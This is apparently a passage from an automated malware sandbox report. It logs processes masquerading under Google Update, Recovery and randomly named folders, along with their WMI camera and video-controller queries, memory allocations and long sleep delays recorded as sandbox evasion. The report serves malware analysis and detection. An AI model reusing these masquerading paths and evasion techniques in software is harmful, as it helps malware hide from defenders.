            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeMemory allocated: 1AC00000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeMemory allocated: 1B220000 memory reserve | memory write watchJump to behavior
            Source: C:\Recovery\fontdrvhost.exeMemory allocated: AF0000 memory reserve | memory write watch
            Source: C:\Recovery\fontdrvhost.exeMemory allocated: 1A800000 memory reserve | memory write watch
            Source: C:\Recovery\fontdrvhost.exeMemory allocated: F10000 memory reserve | memory write watch
            Source: C:\Recovery\fontdrvhost.exeMemory allocated: 1AA80000 memory reserve | memory write watch
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeMemory allocated: 1120000 memory reserve | memory write watch
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeMemory allocated: 1AC10000 memory reserve | memory write watch
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeMemory allocated: 1460000 memory reserve | memory write watch
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeMemory allocated: 1B2D0000 memory reserve | memory write watch
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599901Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598139Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595727Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 593281Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 593062Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592812Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592265Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591859Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591234Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 590812Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589703Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589312Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589078Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588750Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588484Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 587920Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 587562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 586437Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 586001Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585656Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585453Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585140Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584827Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584468Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584307Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584004Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583703Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583390Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583258Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583154Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583042Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582935Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582816Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582701Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582593Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWindow / User API: threadDelayed 1182Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWindow / User API: threadDelayed 752Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWindow / User API: threadDelayed 4824Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWindow / User API: threadDelayed 4753Jump to behavior
            Source: C:\Recovery\fontdrvhost.exeWindow / User API: threadDelayed 364
            Source: C:\Recovery\fontdrvhost.exeWindow / User API: threadDelayed 366
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeWindow / User API: threadDelayed 367
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeWindow / User API: threadDelayed 370
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7816Thread sleep count: 1182 > 30Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7772Thread sleep count: 752 > 30Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7752Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -19369081277395017s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599901s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598139s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -596203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -595875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -595727s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -594281s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -593281s >= -30000sJump to behavior
